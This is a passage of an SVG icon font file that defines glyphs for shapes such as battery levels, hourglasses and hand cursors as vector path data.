q98 -84 158 -222q85 -10 121 9h1q5 3 8.5 10t5.5 19t3 19.5t3 21.5l1 14q3 28 32 40t52 -5q73 -52 91 -178q7 -57 -3.5 -113t-42.5 -91q-28 -32 -83.5 -48.5t-115.5 -18.5v-10q-71 -2 -95 -43q-14 -5 -31 -17q11 -1 32 -3.5t30 -3.5q1 5 5 8q16 18 60 23h13q5 18 19 30t33 8
t36 -23t19 -36q79 -32 93 -95q9 -40 1 -81q-12 -53 -56 -88t-97 -44q-10 -2 -17 -2q0 -49 -1 -73q20 15 38 19q26 7 61 2q28 28 51 16q14 -9 14 -37q33 -16 59 -34q27 13 38 4q10 -10 2 -38q28 -30 41 -51q23 8 31 -1zM1937 1025q0 -29 -9 -54q82 -32 112 -132
q4 37 -9.5 98.5t-41.5 90.5q-20 19 -36 17t-16 -20zM1859 925q35 -42 47.5 -108.5t-0.5 -124.5q67 13 97 45q13 14 18 28q-3 64 -31 114.5t-79 66.5q-15 -15 -52 -21zM1822 921q-30 0 -44 1q42 -115 53 -239q21 0 43 3q16 68 1 135t-53 100zM258 839q30 100 112 132
q-9 25 -9 54q0 18 -16.5 20t-35.5 -17q-28 -29 -41.5 -90.5t-9.5 -98.5zM294 737q29 -31 97 -45q-13 58 -0.5 124.5t47.5 108.5v0q-37 6 -52 21q-51 -16 -78.5 -66t-31.5 -115q9 -17 18 -28zM471 683q14 124 73 235q-19 -4 -55 -18l-45 -19v1q-46 -89 -20 -196q25 -3 47 -3z
M1434 644q8 -38 16.5 -108.5t11.5 -89.5q3 -18 9.5 -21.5t23.5 4.5q40 20 62 85.5t23 125.5q-24 2 -146 4zM1152 1285q-116 0 -199 -82.5t-83 -198.5q0 -117 83 -199.5t199 -82.5t199 82.5t83 199.5q0 116 -83 198.5t-199 82.5zM1380 646q-105 2 -211 0v1q-1 -27 2.5 -86
t13.5 -66q29 -14 93.5 -14.5t95.5 10.5q9 3 11 39t-0.5 69.5t-4.5 46.5zM1112 447q8 4 9.5 48t-0.5 88t-4 63v1q-212 -3 -214 -3q-4 -20 -7 -62t0 -83t14 -46q34 -15 101 -16t101 10zM718 636q-16 -59 4.5 -118.5t77.5 -84.5q15 -8 24 -5t12 21q3 16 8 90t10 103
q-69 -2 -136 -6zM591 510q3 -23 -34 -36q132 -141 271.5 -240t305.5 -154q172 49 310.5 146t293.5 250q-33 13 -30 34q0 2 0.5 3.5t1.5 3t1 2.5v1v-1q-17 2 -50 5.5t-48 4.5q-26 -90 -82 -132q-51 -38 -82 1q-5 6 -9 14q-7 13 -17 62q-2 -5 -5 -9t-7.5 -7t-8 -5.5t-9.5 -4
l-10 -2.5t-12 -2l-12 -1.5t-13.5 -1t-13.5 -0.5q-106 -9 -163 11q-4 -17 -10 -26.5t-21 -15t-23 -7t-36 -3.5q-6 -1 -9 -1q-179 -17 -203 40q-2 -63 -56 -54q-47 8 -91 54q-12 13 -20 26q-17 29 -26 65q-58 -6 -87 -10q1 -2 4 -10zM507 -118q3 14 3 30q-17 71 -51 130
t-73 70q-41 12 -101.5 -14.5t-104.5 -80t-39 -107.5q35 -53 100 -93t119 -42q51 -2 94 28t53 79zM510 53q23 -63 27 -119q195 113 392 174q-98 52 -180.5 120t-179.5 165q-6 -4 -29 -13q0 -1 -1 -4t-1 -5q31 -18 22 -37q-12 -23 -56 -34q-10 -13 -29 -24h-1q-2 -83 1 -150
q19 -34 35 -73zM579 -113q532 -21 1145 0q-254 147 -428 196q-76 -35 -156 -57q-8 -3 -16 0q-65 21 -129 49q-208 -60 -416 -188h-1v-1q1 0 1 1zM1763 -67q4 54 28 120q14 38 33 71l-1 -1q3 77 3 153q-15 8 -30 25q-42 9 -56 33q-9 20 22 38q-2 4 -2 9q-16 4 -28 12
q-204 -190 -383 -284q198 -59 414 -176zM2155 -90q5 54 -39 107.5t-104 80t-102 14.5q-38 -11 -72.5 -70.5t-51.5 -129.5q0 -16 3 -30q10 -49 53 -79t94 -28q54 2 119 42t100 93z" />
    <glyph glyph-name="_538" unicode="&#xf23d;" horiz-adv-x="2304" 
d="M1524 -25q0 -68 -48 -116t-116 -48t-116.5 48t-48.5 116t48.5 116.5t116.5 48.5t116 -48.5t48 -116.5zM775 -25q0 -68 -48.5 -116t-116.5 -48t-116 48t-48 116t48 116.5t116 48.5t116.5 -48.5t48.5 -116.5zM0 1469q57 -60 110.5 -104.5t121 -82t136 -63t166 -45.5
t200 -31.5t250 -18.5t304 -9.5t372.5 -2.5q139 0 244.5 -5t181 -16.5t124 -27.5t71 -39.5t24 -51.5t-19.5 -64t-56.5 -76.5t-89.5 -91t-116 -104.5t-139 -119q-185 -157 -286 -247q29 51 76.5 109t94 105.5t94.5 98.5t83 91.5t54 80.5t13 70t-45.5 55.5t-116.5 41t-204 23.5
t-304 5q-168 -2 -314 6t-256 23t-204.5 41t-159.5 51.5t-122.5 62.5t-91.5 66.5t-68 71.5t-50.5 69.5t-40 68t-36.5 59.5z" />
    <glyph glyph-name="_539" unicode="&#xf23e;" horiz-adv-x="1792" 
d="M896 1472q-169 0 -323 -66t-265.5 -177.5t-177.5 -265.5t-66 -323t66 -323t177.5 -265.5t265.5 -177.5t323 -66t323 66t265.5 177.5t177.5 265.5t66 323t-66 323t-177.5 265.5t-265.5 177.5t-323 66zM896 1536q182 0 348 -71t286 -191t191 -286t71 -348t-71 -348
t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71zM496 704q16 0 16 -16v-480q0 -16 -16 -16h-32q-16 0 -16 16v480q0 16 16 16h32zM896 640q53 0 90.5 -37.5t37.5 -90.5q0 -35 -17.5 -64t-46.5 -46v-114q0 -14 -9 -23
t-23 -9h-64q-14 0 -23 9t-9 23v114q-29 17 -46.5 46t-17.5 64q0 53 37.5 90.5t90.5 37.5zM896 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM544 928v-96
q0 -14 9 -23t23 -9h64q14 0 23 9t9 23v96q0 93 65.5 158.5t158.5 65.5t158.5 -65.5t65.5 -158.5v-96q0 -14 9 -23t23 -9h64q14 0 23 9t9 23v96q0 146 -103 249t-249 103t-249 -103t-103 -249zM1408 192v512q0 26 -19 45t-45 19h-896q-26 0 -45 -19t-19 -45v-512
q0 -26 19 -45t45 -19h896q26 0 45 19t19 45z" />
    <glyph glyph-name="_540" unicode="&#xf240;" horiz-adv-x="2304" 
d="M1920 1024v-768h-1664v768h1664zM2048 448h128v384h-128v288q0 14 -9 23t-23 9h-1856q-14 0 -23 -9t-9 -23v-960q0 -14 9 -23t23 -9h1856q14 0 23 9t9 23v288zM2304 832v-384q0 -53 -37.5 -90.5t-90.5 -37.5v-160q0 -66 -47 -113t-113 -47h-1856q-66 0 -113 47t-47 113
v960q0 66 47 113t113 47h1856q66 0 113 -47t47 -113v-160q53 0 90.5 -37.5t37.5 -90.5z" />
    <glyph glyph-name="_541" unicode="&#xf241;" horiz-adv-x="2304" 
d="M256 256v768h1280v-768h-1280zM2176 960q53 0 90.5 -37.5t37.5 -90.5v-384q0 -53 -37.5 -90.5t-90.5 -37.5v-160q0 -66 -47 -113t-113 -47h-1856q-66 0 -113 47t-47 113v960q0 66 47 113t113 47h1856q66 0 113 -47t47 -113v-160zM2176 448v384h-128v288q0 14 -9 23t-23 9
h-1856q-14 0 -23 -9t-9 -23v-960q0 -14 9 -23t23 -9h1856q14 0 23 9t9 23v288h128z" />
    <glyph glyph-name="_542" unicode="&#xf242;" horiz-adv-x="2304" 
d="M256 256v768h896v-768h-896zM2176 960q53 0 90.5 -37.5t37.5 -90.5v-384q0 -53 -37.5 -90.5t-90.5 -37.5v-160q0 -66 -47 -113t-113 -47h-1856q-66 0 -113 47t-47 113v960q0 66 47 113t113 47h1856q66 0 113 -47t47 -113v-160zM2176 448v384h-128v288q0 14 -9 23t-23 9
h-1856q-14 0 -23 -9t-9 -23v-960q0 -14 9 -23t23 -9h1856q14 0 23 9t9 23v288h128z" />
    <glyph glyph-name="_543" unicode="&#xf243;" horiz-adv-x="2304" 
d="M256 256v768h512v-768h-512zM2176 960q53 0 90.5 -37.5t37.5 -90.5v-384q0 -53 -37.5 -90.5t-90.5 -37.5v-160q0 -66 -47 -113t-113 -47h-1856q-66 0 -113 47t-47 113v960q0 66 47 113t113 47h1856q66 0 113 -47t47 -113v-160zM2176 448v384h-128v288q0 14 -9 23t-23 9
h-1856q-14 0 -23 -9t-9 -23v-960q0 -14 9 -23t23 -9h1856q14 0 23 9t9 23v288h128z" />
    <glyph glyph-name="_544" unicode="&#xf244;" horiz-adv-x="2304" 
d="M2176 960q53 0 90.5 -37.5t37.5 -90.5v-384q0 -53 -37.5 -90.5t-90.5 -37.5v-160q0 -66 -47 -113t-113 -47h-1856q-66 0 -113 47t-47 113v960q0 66 47 113t113 47h1856q66 0 113 -47t47 -113v-160zM2176 448v384h-128v288q0 14 -9 23t-23 9h-1856q-14 0 -23 -9t-9 -23
v-960q0 -14 9 -23t23 -9h1856q14 0 23 9t9 23v288h128z" />
    <glyph glyph-name="_545" unicode="&#xf245;" horiz-adv-x="1280" 
d="M1133 493q31 -30 14 -69q-17 -40 -59 -40h-382l201 -476q10 -25 0 -49t-34 -35l-177 -75q-25 -10 -49 0t-35 34l-191 452l-312 -312q-19 -19 -45 -19q-12 0 -24 5q-40 17 -40 59v1504q0 42 40 59q12 5 24 5q27 0 45 -19z" />
    <glyph glyph-name="_546" unicode="&#xf246;" horiz-adv-x="1024" 
d="M832 1408q-320 0 -320 -224v-416h128v-128h-128v-544q0 -224 320 -224h64v-128h-64q-272 0 -384 146q-112 -146 -384 -146h-64v128h64q320 0 320 224v544h-128v128h128v416q0 224 -320 224h-64v128h64q272 0 384 -146q112 146 384 146h64v-128h-64z" />
    <glyph glyph-name="_547" unicode="&#xf247;" horiz-adv-x="2048" 
d="M2048 1152h-128v-1024h128v-384h-384v128h-1280v-128h-384v384h128v1024h-128v384h384v-128h1280v128h384v-384zM1792 1408v-128h128v128h-128zM128 1408v-128h128v128h-128zM256 -128v128h-128v-128h128zM1664 0v128h128v1024h-128v128h-1280v-128h-128v-1024h128v-128
h1280zM1920 -128v128h-128v-128h128zM1280 896h384v-768h-896v256h-384v768h896v-256zM512 512h640v512h-640v-512zM1536 256v512h-256v-384h-384v-128h640z" />
    <glyph glyph-name="_548" unicode="&#xf248;" horiz-adv-x="2304" 
d="M2304 768h-128v-640h128v-384h-384v128h-896v-128h-384v384h128v128h-384v-128h-384v384h128v640h-128v384h384v-128h896v128h384v-384h-128v-128h384v128h384v-384zM2048 1024v-128h128v128h-128zM1408 1408v-128h128v128h-128zM128 1408v-128h128v128h-128zM256 256
v128h-128v-128h128zM1536 384h-128v-128h128v128zM384 384h896v128h128v640h-128v128h-896v-128h-128v-640h128v-128zM896 -128v128h-128v-128h128zM2176 -128v128h-128v-128h128zM2048 128v640h-128v128h-384v-384h128v-384h-384v128h-384v-128h128v-128h896v128h128z" />
    <glyph glyph-name="_549" unicode="&#xf249;" 
d="M1024 288v-416h-928q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h1344q40 0 68 -28t28 -68v-928h-416q-40 0 -68 -28t-28 -68zM1152 256h381q-15 -82 -65 -132l-184 -184q-50 -50 -132 -65v381z" />
    <glyph glyph-name="_550" unicode="&#xf24a;" 
d="M1400 256h-248v-248q29 10 41 22l185 185q12 12 22 41zM1120 384h288v896h-1280v-1280h896v288q0 40 28 68t68 28zM1536 1312v-1024q0 -40 -20 -88t-48 -76l-184 -184q-28 -28 -76 -48t-88 -20h-1024q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h1344q40 0 68 -28t28 -68
z" />
    <glyph glyph-name="_551" unicode="&#xf24b;" horiz-adv-x="2304" 
d="M1951 538q0 -26 -15.5 -44.5t-38.5 -23.5q-8 -2 -18 -2h-153v140h153q10 0 18 -2q23 -5 38.5 -23.5t15.5 -44.5zM1933 751q0 -25 -15 -42t-38 -21q-3 -1 -15 -1h-139v129h139q3 0 8.5 -0.5t6.5 -0.5q23 -4 38 -21.5t15 -42.5zM728 587v308h-228v-308q0 -58 -38 -94.5
t-105 -36.5q-108 0 -229 59v-112q53 -15 121 -23t109 -9l42 -1q328 0 328 217zM1442 403v113q-99 -52 -200 -59q-108 -8 -169 41t-61 142t61 142t169 41q101 -7 200 -58v112q-48 12 -100 19.5t-80 9.5l-28 2q-127 6 -218.5 -14t-140.5 -60t-71 -88t-22 -106t22 -106t71 -88
t140.5 -60t218.5 -14q101 4 208 31zM2176 518q0 54 -43 88.5t-109 39.5v3q57 8 89 41.5t32 79.5q0 55 -41 88t-107 36q-3 0 -12 0.5t-14 0.5h-455v-510h491q74 0 121.5 36.5t47.5 96.5zM2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90
t90 38h2048q52 0 90 -38t38 -90z" />
    <glyph glyph-name="_552" unicode="&#xf24c;" horiz-adv-x="2304" 
d="M858 295v693q-106 -41 -172 -135.5t-66 -211.5t66 -211.5t172 -134.5zM1362 641q0 117 -66 211.5t-172 135.5v-694q106 41 172 135.5t66 211.5zM1577 641q0 -159 -78.5 -294t-213.5 -213.5t-294 -78.5q-119 0 -227.5 46.5t-187 125t-125 187t-46.5 227.5q0 159 78.5 294
t213.5 213.5t294 78.5t294 -78.5t213.5 -213.5t78.5 -294zM1960 634q0 139 -55.5 261.5t-147.5 205.5t-213.5 131t-252.5 48h-301q-176 0 -323.5 -81t-235 -230t-87.5 -335q0 -171 87 -317.5t236 -231.5t323 -85h301q129 0 251.5 50.5t214.5 135t147.5 202.5t55.5 246z
M2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h2048q52 0 90 -38t38 -90z" />
    <glyph glyph-name="_553" unicode="&#xf24d;" horiz-adv-x="1792" 
d="M1664 -96v1088q0 13 -9.5 22.5t-22.5 9.5h-1088q-13 0 -22.5 -9.5t-9.5 -22.5v-1088q0 -13 9.5 -22.5t22.5 -9.5h1088q13 0 22.5 9.5t9.5 22.5zM1792 992v-1088q0 -66 -47 -113t-113 -47h-1088q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1088q66 0 113 -47t47 -113
zM1408 1376v-160h-128v160q0 13 -9.5 22.5t-22.5 9.5h-1088q-13 0 -22.5 -9.5t-9.5 -22.5v-1088q0 -13 9.5 -22.5t22.5 -9.5h160v-128h-160q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1088q66 0 113 -47t47 -113z" />
    <glyph glyph-name="_554" unicode="&#xf24e;" horiz-adv-x="2304" 
d="M1728 1088l-384 -704h768zM448 1088l-384 -704h768zM1269 1280q-14 -40 -45.5 -71.5t-71.5 -45.5v-1291h608q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1344q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h608v1291q-40 14 -71.5 45.5t-45.5 71.5h-491q-14 0 -23 9t-9 23v64
q0 14 9 23t23 9h491q21 57 70 92.5t111 35.5t111 -35.5t70 -92.5h491q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-491zM1088 1264q33 0 56.5 23.5t23.5 56.5t-23.5 56.5t-56.5 23.5t-56.5 -23.5t-23.5 -56.5t23.5 -56.5t56.5 -23.5zM2176 384q0 -73 -46.5 -131t-117.5 -91
t-144.5 -49.5t-139.5 -16.5t-139.5 16.5t-144.5 49.5t-117.5 91t-46.5 131q0 11 35 81t92 174.5t107 195.5t102 184t56 100q18 33 56 33t56 -33q4 -7 56 -100t102 -184t107 -195.5t92 -174.5t35 -81zM896 384q0 -73 -46.5 -131t-117.5 -91t-144.5 -49.5t-139.5 -16.5
t-139.5 16.5t-144.5 49.5t-117.5 91t-46.5 131q0 11 35 81t92 174.5t107 195.5t102 184t56 100q18 33 56 33t56 -33q4 -7 56 -100t102 -184t107 -195.5t92 -174.5t35 -81z" />
    <glyph glyph-name="_555" unicode="&#xf250;" 
d="M1408 1408q0 -261 -106.5 -461.5t-266.5 -306.5q160 -106 266.5 -306.5t106.5 -461.5h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1472q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96q0 261 106.5 461.5t266.5 306.5q-160 106 -266.5 306.5t-106.5 461.5h-96q-14 0 -23 9
t-9 23v64q0 14 9 23t23 9h1472q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96zM874 700q77 29 149 92.5t129.5 152.5t92.5 210t35 253h-1024q0 -132 35 -253t92.5 -210t129.5 -152.5t149 -92.5q19 -7 30.5 -23.5t11.5 -36.5t-11.5 -36.5t-30.5 -23.5q-77 -29 -149 -92.5
t-129.5 -152.5t-92.5 -210t-35 -253h1024q0 132 -35 253t-92.5 210t-129.5 152.5t-149 92.5q-19 7 -30.5 23.5t-11.5 36.5t11.5 36.5t30.5 23.5z" />
    <glyph glyph-name="_556" unicode="&#xf251;" 
d="M1408 1408q0 -261 -106.5 -461.5t-266.5 -306.5q160 -106 266.5 -306.5t106.5 -461.5h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1472q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96q0 261 106.5 461.5t266.5 306.5q-160 106 -266.5 306.5t-106.5 461.5h-96q-14 0 -23 9
t-9 23v64q0 14 9 23t23 9h1472q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96zM1280 1408h-1024q0 -66 9 -128h1006q9 61 9 128zM1280 -128q0 130 -34 249.5t-90.5 208t-126.5 152t-146 94.5h-230q-76 -31 -146 -94.5t-126.5 -152t-90.5 -208t-34 -249.5h1024z" />
    <glyph glyph-name="_557" unicode="&#xf252;" 
d="M1408 1408q0 -261 -106.5 -461.5t-266.5 -306.5q160 -106 266.5 -306.5t106.5 -461.5h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1472q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96q0 261 106.5 461.5t266.5 306.5q-160 106 -266.5 306.5t-106.5 461.5h-96q-14 0 -23 9
t-9 23v64q0 14 9 23t23 9h1472q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96zM1280 1408h-1024q0 -206 85 -384h854q85 178 85 384zM1223 192q-54 141 -145.5 241.5t-194.5 142.5h-230q-103 -42 -194.5 -142.5t-145.5 -241.5h910z" />
    <glyph glyph-name="_558" unicode="&#xf253;" 
d="M1408 1408q0 -261 -106.5 -461.5t-266.5 -306.5q160 -106 266.5 -306.5t106.5 -461.5h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1472q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96q0 261 106.5 461.5t266.5 306.5q-160 106 -266.5 306.5t-106.5 461.5h-96q-14 0 -23 9
t-9 23v64q0 14 9 23t23 9h1472q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96zM874 700q77 29 149 92.5t129.5 152.5t92.5 210t35 253h-1024q0 -132 35 -253t92.5 -210t129.5 -152.5t149 -92.5q19 -7 30.5 -23.5t11.5 -36.5t-11.5 -36.5t-30.5 -23.5q-137 -51 -244 -196
h700q-107 145 -244 196q-19 7 -30.5 23.5t-11.5 36.5t11.5 36.5t30.5 23.5z" />
    <glyph glyph-name="_559" unicode="&#xf254;" 
d="M1504 -64q14 0 23 -9t9 -23v-128q0 -14 -9 -23t-23 -9h-1472q-14 0 -23 9t-9 23v128q0 14 9 23t23 9h1472zM130 0q3 55 16 107t30 95t46 87t53.5 76t64.5 69.5t66 60t70.5 55t66.5 47.5t65 43q-43 28 -65 43t-66.5 47.5t-70.5 55t-66 60t-64.5 69.5t-53.5 76t-46 87
t-30 95t-16 107h1276q-3 -55 -16 -107t-30 -95t-46 -87t-53.5 -76t-64.5 -69.5t-66 -60t-70.5 -55t-66.5 -47.5t-65 -43q43 -28 65 -43t66.5 -47.5t70.5 -55t66 -60t64.5 -69.5t53.5 -76t46 -87t30 -95t16 -107h-1276zM1504 1536q14 0 23 -9t9 -23v-128q0 -14 -9 -23t-23 -9
h-1472q-14 0 -23 9t-9 23v128q0 14 9 23t23 9h1472z" />
    <glyph glyph-name="_560" unicode="&#xf255;" 
d="M768 1152q-53 0 -90.5 -37.5t-37.5 -90.5v-128h-32v93q0 48 -32 81.5t-80 33.5q-46 0 -79 -33t-33 -79v-429l-32 30v172q0 48 -32 81.5t-80 33.5q-46 0 -79 -33t-33 -79v-224q0 -47 35 -82l310 -296q39 -39 39 -102q0 -26 19 -45t45 -19h640q26 0 45 19t19 45v25
q0 41 10 77l108 436q10 36 10 77v246q0 48 -32 81.5t-80 33.5q-46 0 -79 -33t-33 -79v-32h-32v125q0 40 -25 72.5t-64 40.5q-14 2 -23 2q-46 0 -79 -33t-33 -79v-128h-32v122q0 51 -32.5 89.5t-82.5 43.5q-5 1 -13 1zM768 1280q84 0 149 -50q57 34 123 34q59 0 111 -27
t86 -76q27 7 59 7q100 0 170 -71.5t70 -171.5v-246q0 -51 -13 -108l-109 -436q-6 -24 -6 -71q0 -80 -56 -136t-136 -56h-640q-84 0 -138 58.5t-54 142.5l-308 296q-76 73 -76 175v224q0 99 70.5 169.5t169.5 70.5q11 0 16 -1q6 95 75.5 160t164.5 65q52 0 98 -21
q72 69 174 69z" />
    <glyph glyph-name="_561" unicode="&#xf256;" horiz-adv-x="1792" 
d="M880 1408q-46 0 -79 -33t-33 -79v-656h-32v528q0 46 -33 79t-79 33t-79 -33t-33 -79v-528v-256l-154 205q-38 51 -102 51q-53 0 -90.5 -37.5t-37.5 -90.5q0 -43 26 -77l384 -512q38 -51 102 -51h688q34 0 61 22t34 56l76 405q5 32 5 59v498q0 46 -33 79t-79 33t-79 -33
t-33 -79v-272h-32v528q0 46 -33 79t-79 33t-79 -33t-33 -79v-528h-32v656q0 46 -33 79t-79 33zM880 1536q68 0 125.5 -35.5t88.5 -96.5q19 4 42 4q99 0 169.5 -70.5t70.5 -169.5v-17q105 6 180.5 -64t75.5 -175v-498q0 -40 -8 -83l-76 -404q-14 -79 -76.5 -131t-143.5 -52
h-688q-60 0 -114.5 27.5t-90.5 74.5l-384 512q-51 68 -51 154q0 106 75 181t181 75q78 0 128 -34v434q0 99 70.5 169.5t169.5 70.5q23 0 42 -4q31 61 88.5 96.5t125.5 35.5z" />
    <glyph glyph-name="_562" unicode="&#xf257;" horiz-adv-x="1792" 
d="M1073 -128h-177q-163 0 -226 141q-23 49 -23 102v5q-62 30 -98.5 88.5t-36.5 127.5q0 38 5 48h-261q-106 0 -181 75t-75 181t75 181t181 75h113l-44 17q-74 28 -119.5 93.5t-45.5 145.5q0 106 75 181t181 75q46 0 91 -17l628 -239h401q106 0 181 -75t75 -181v-668
q0 -88 -54 -157.5t-140 -90.5l-339 -85q-92 -23 -186 -23zM1024 583l-155 -71l-163 -74q-30 -14 -48 -41.5t-18 -60.5q0 -46 33 -79t79 -33q26 0 46 10l338 154q-49 10 -80.5 50t-31.5 90v55zM1344 272q0 46 -33 79t-79 33q-26 0 -46 -10l-290 -132q-28 -13 -37 -17
t-30.5 -17t-29.5 -23.5t-16 -29t-8 -40.5q0 -50 31.5 -82t81.5 -32q20 0 38 9l352 160q30 14 48 41.5t18 60.5zM1112 1024l-650 248q-24 8 -46 8q-53 0 -90.5 -37.5t-37.5 -90.5q0 -40 22.5 -73t59.5 -47l526 -200v-64h-640q-53 0 -90.5 -37.5t-37.5 -90.5t37.5 -90.5
t90.5 -37.5h535l233 106v198q0 63 46 106l111 102h-69zM1073 0q82 0 155 19l339 85q43 11 70 45.5t27 78.5v668q0 53 -37.5 90.5t-90.5 37.5h-308l-136 -126q-36 -33 -36 -82v-296q0 -46 33 -77t79 -31t79 35t33 81v208h32v-208q0 -70 -57 -114q52 -8 86.5 -48.5t34.5 -93.5
q0 -42 -23 -78t-61 -53l-310 -141h91z" />
    <glyph glyph-name="_563" unicode="&#xf258;" horiz-adv-x="2048" 
d="M1151 1536q61 0 116 -28t91 -77l572 -781q118 -159 118 -359v-355q0 -80 -56 -136t-136 -56h-384q-80 0 -136 56t-56 136v177l-286 143h-546q-80 0 -136 56t-56 136v32q0 119 84.5 203.5t203.5 84.5h420l42 128h-686q-100 0 -173.5 67.5t-81.5 166.5q-65 79 -65 182v32
q0 80 56 136t136 56h959zM1920 -64v355q0 157 -93 284l-573 781q-39 52 -103 52h-959q-26 0 -45 -19t-19 -45q0 -32 1.5 -49.5t9.5 -40.5t25 -43q10 31 35.5 50t56.5 19h832v-32h-832q-26 0 -45 -19t-19 -45q0 -44 3 -58q8 -44 44 -73t81 -29h640h91q40 0 68 -28t28 -68
q0 -15 -5 -30l-64 -192q-10 -29 -35 -47.5t-56 -18.5h-443q-66 0 -113 -47t-47 -113v-32q0 -26 19 -45t45 -19h561q16 0 29 -7l317 -158q24 -13 38.5 -36t14.5 -50v-197q0 -26 19 -45t45 -19h384q26 0 45 19t19 45z" />
    <glyph glyph-name="_564" unicode="&#xf259;" horiz-adv-x="2048" 
d="M459 -256q-77 0 -137.5 47.5t-79.5 122.5l-101 401q-13 57 -13 108q0 45 -5 67l-116 477q-7 27 -7 57q0 93 62 161t155 78q17 85 82.5 139t152.5 54q83 0 148 -51.5t85 -132.5l83 -348l103 428q20 81 85 132.5t148 51.5q89 0 155.5 -57.5t80.5 -144.5q92 -10 152 -79
t60 -162q0 -24 -7 -59l-123 -512q10 7 37.5 28.5t38.5 29.5t35 23t41 20.5t41.5 11t49.5 5.5q105 0 180 -74t75 -179q0 -62 -28.5 -118t-78.5 -94l-507 -380q-68 -51 -153 -51h-694zM1104 1408q-38 0 -68.5 -24t-39.5 -62l-164 -682h-127l-145 602q-9 38 -39.5 62t-68.5 24
q-48 0 -80 -33t-32 -80q0 -15 3 -28l132 -547h-26l-99 408q-9 37 -40 62.5t-69 25.5q-47 0 -80 -33t-33 -79q0 -14 3 -26l116 -478q7 -28 9 -86t10 -88l100 -401q8 -32 34 -52.5t59 -20.5h694q42 0 76 26l507 379q56 43 56 110q0 52 -37.5 88.5t-89.5 36.5q-43 0 -77 -26
l-307 -230v227q0 4 32 138t68 282t39 161q4 18 4 29q0 47 -32 81t-79 34q-39 0 -69.5 -24t-39.5 -62l-116 -482h-26l150 624q3 14 3 28q0 48 -31.5 82t-79.5 34z" />
    <glyph glyph-name="_565" unicode="&#xf25a;" horiz-adv-x="1792" 
d="M640 1408q-53 0 -90.5 -37.5t-37.5 -90.5v-512v-384l-151 202q-41 54 -107 54q-52 0 -89 -38t-37 -90q0 -43 26 -77l384 -512q38 -51 102 -51h718q22 0 39.5 13.5t22.5 34.5l92 368q24 96 24 194v217q0 41 -28 71t-68 30t-68 -28t-28 -68h-32v61q0 48 -32 81.5t-80 33.5
q-46 0 -79 -33t-33 -79v-64h-32v90q0 55 -37 94.5t-91 39.5q-53 0 -90.5 -37.5t-37.5 -90.5v-96h-32v570q0 55 -37 94.5t-91 39.5zM640 1536q107 0 181.5 -77.5t74.5 -184.5v-220q22 2 32 2q99 0 173 -69q47 21 99 21q113 0 184 -87q27 7 56 7q94 0 159 -67.5t65 -161.5
v-217q0 -116 -28 -225l-92 -368q-16 -64 -68 -104.5t-118 -40.5h-718q-60 0 -114.5 27.5t-90.5 74.5l-384 512q-51 68 -51 154q0 105 74.5 180.5t179.5 75.5q71 0 130 -35v547q0 106 75 181t181 75zM768 128v384h-32v-384h32zM1024 128v384h-32v-384h32zM1280 128v384h-32
v-384h32z" />
    <glyph glyph-name="_566" unicode="&#xf25b;" 
d="M1288 889q60 0 107 -23q141 -63 141 -226v-177q0 -94 -23 -186l-85 -339q-21 -86 -90.5 -140t-157.5 -54h-668q-106 0 -181 75t-75 181v401l-239 628q-17 45 -17 91q0 106 75 181t181 75q80 0 145.5 -45.5t93.5 -119.5l17 -44v113q0 106 75 181t181 75t181 -75t75 -181
v-261q27 5 48 5q69 0 127.5 -36.5t88.5 -98.5zM1072 896q-33 0 -60.5 -18t-41.5 -48l-74 -163l-71 -155h55q50 0 90 -31.5t50 -80.5l154 338q10 20 10 46q0 46 -33 79t-79 33zM1293 761q-22 0 -40.5 -8t-29 -16t-23.5 -29.5t-17 -30.5t-17 -37l-132 -290q-10 -20 -10 -46
q0 -46 33 -79t79 -33q33 0 60.5 18t41.5 48l160 352q9 18 9 38q0 50 -32 81.5t-82 31.5zM128 1120q0 -22 8 -46l248 -650v-69l102 111q43 46 106 46h198l106 233v535q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5v-640h-64l-200 526q-14 37 -47 59.5t-73 22.5
q-53 0 -90.5 -37.5t-37.5 -90.5zM1180 -128q44 0 78.5 27t45.5 70l85 339q19 73 19 155v91l-141 -310q-17 -38 -53 -61t-78 -23q-53 0 -93.5 34.5t-48.5 86.5q-44 -57 -114 -57h-208v32h208q46 0 81 33t35 79t-31 79t-77 33h-296q-49 0 -82 -36l-126 -136v-308
q0 -53 37.5 -90.5t90.5 -37.5h668z" />
    <glyph glyph-name="_567" unicode="&#xf25c;" horiz-adv-x="1973" 
d="M857 992v-117q0 -13 -9.5 -22t-22.5 -9h-298v-812q0 -13 -9 -22.5t-22 -9.5h-135q-13 0 -22.5 9t-9.5 23v812h-297q-13 0 -22.5 9t-9.5 22v117q0 14 9 23t23 9h793q13 0 22.5 -9.5t9.5 -22.5zM1895 995l77 -961q1 -13 -8 -24q-10 -10 -23 -10h-134q-12 0 -21 8.5
